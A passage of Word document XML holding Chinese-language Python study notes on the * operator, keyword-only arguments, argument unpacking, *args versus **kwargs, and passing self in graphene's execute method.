          <w:bCs/>
        </w:rPr>
        <w:t>用于</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>强制关键字参数</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5450344C" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>在函数定义中的</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>可以用来强制后面的参数必须通过关键字来传递，而不能通过位置传递。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F33B87" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453F5D72" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF0A91F" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D94C168" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>def my_function(a, b, *, c):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECCA6FE" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve">    print(a, b, c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2F53FD" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F"/>
    <w:p w14:paraId="0EB5D22D" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve">my_function(1, 2, c=3)  # c </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>必须作为关键字参数传入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704CC3D7" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>输出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C01F17C" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019A0EEC" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>1 2 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3B244B" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>如果你试图通过位置传递</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve"> c</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>，会抛出错误：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEBF956" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C91E0A" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9233E6" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve">my_function(1, 2, 3)  # </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>会报错，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve"> c </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>需要作为关键字参数传入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DDBA9C" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>用于</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>解包</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>列表或元组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4CCFC6" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>还可以用于函数调用时解包列表或元组，将其元素作为单独的参数传递给函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCB99AC" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D344EA" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:lastRenderedPageBreak/>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440767ED" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2ABB4C" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>def my_function(a, b, c):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616053DC" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve">    print(a, b, c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477E0580" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F"/>
    <w:p w14:paraId="48A5CC87" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>args = (1, 2, 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA42665" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t xml:space="preserve">my_function(*args)  # </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>解包元组，将其作为单独的参数传递</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0361B1E2" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>输出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F1DFA0" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1CE3A1" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:r w:rsidRPr="003F5F7F">
        <w:t>1 2 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5556CD27" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F"/>
    <w:p w14:paraId="444774EB" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F"/>
    <w:p w14:paraId="5E555D8B" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF29755" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>*args</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>：接受任意数量的位置参数，作为一个元组传递给函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A458B0" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>（在参数列表中间）：强制后面的参数只能作为关键字参数传递。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEB5CB5" w14:textId="77777777" w:rsidR="003F5F7F" w:rsidRPr="003F5F7F" w:rsidRDefault="003F5F7F" w:rsidP="003F5F7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5F7F">
        <w:t>（在函数调用时）：解包列表或元组，将其元素作为单独的参数传递。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24629EC6" w14:textId="77777777" w:rsidR="00AE253C" w:rsidRPr="003F5F7F" w:rsidRDefault="00AE253C" w:rsidP="00AE253C"/>
    <w:p w14:paraId="4EB7E01A" w14:textId="77777777" w:rsidR="00AE253C" w:rsidRDefault="00AE253C" w:rsidP="00A817C3"/>
    <w:p w14:paraId="71DA0066" w14:textId="77777777" w:rsidR="00AE253C" w:rsidRPr="00A817C3" w:rsidRDefault="00AE253C" w:rsidP="00A817C3"/>
    <w:p w14:paraId="1E97130A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="439" w:name="_Toc159779883"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数传参中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>**kwargs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的区别</w:t>
      </w:r>
      <w:bookmarkEnd w:id="439"/>
    </w:p>
    <w:p w14:paraId="24C220B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>称之为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Non-keyword Variable Arguments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，无关键字参数；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466D6A77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>**kwargs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>称之为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>keyword Variable Arguments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，有关键字参数；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9A1F3C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当函数中以列表或者元组的形式传参时，就要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AD2FFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当传入字典形式的参数时，就要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>**kwargs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7416EC07" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E69B0B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AC62B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># coding:utf-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5426AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>def foo(*args,**kwargs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065CA207" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print 'args=',args</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC09E97" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print 'kwargs=',kwargs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A90DB9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print '*'*20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62456721" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B924212" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if __name__=='__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD614A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>只传参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>*args=(1,2,3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178A28EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    foo(1,2,3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A50EC28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D808F1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>只传参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>**kwargs=dict(a=1,b=2,c=3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FF9B3C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    foo(a=1,b=2,c=3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F33A1E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15096B44" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
      <w:r>
        <w:t>传入参数</w:t>
      </w:r>
      <w:r>
        <w:t>*args=(1,2,3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2564C56E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
      <w:r>
        <w:t>传入参数</w:t>
      </w:r>
      <w:r>
        <w:t>**kwargs=dict(a=1,b=2,c=3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F6C981" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    foo(1,2,3,a=1,b=2,c=3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079D2AB7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337C6195" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
      <w:r>
        <w:t>传入参数</w:t>
      </w:r>
      <w:r>
        <w:t>*args=(1,'b','c')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B86653" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
      <w:r>
        <w:t>传入参数</w:t>
      </w:r>
      <w:r>
        <w:t>**kwargs=dict(a=1,b='b',c='c')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3A45C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    foo(1,'b','c',a=1,b='b',c='c')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C93FC5F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="440" w:name="_Toc159779884"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法中把自己实例作为参数传递给其他方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="440"/>
    </w:p>
    <w:p w14:paraId="4445A5DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这么写很奇怪，但是我在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>graphene.types.schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>execute()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码中第一次看到这么写的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF9424A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B70E865" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def execute(self, *args, **kwargs):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return graphql(self, *args, **kwargs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359070E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01479A99" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里面通过调试发现把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
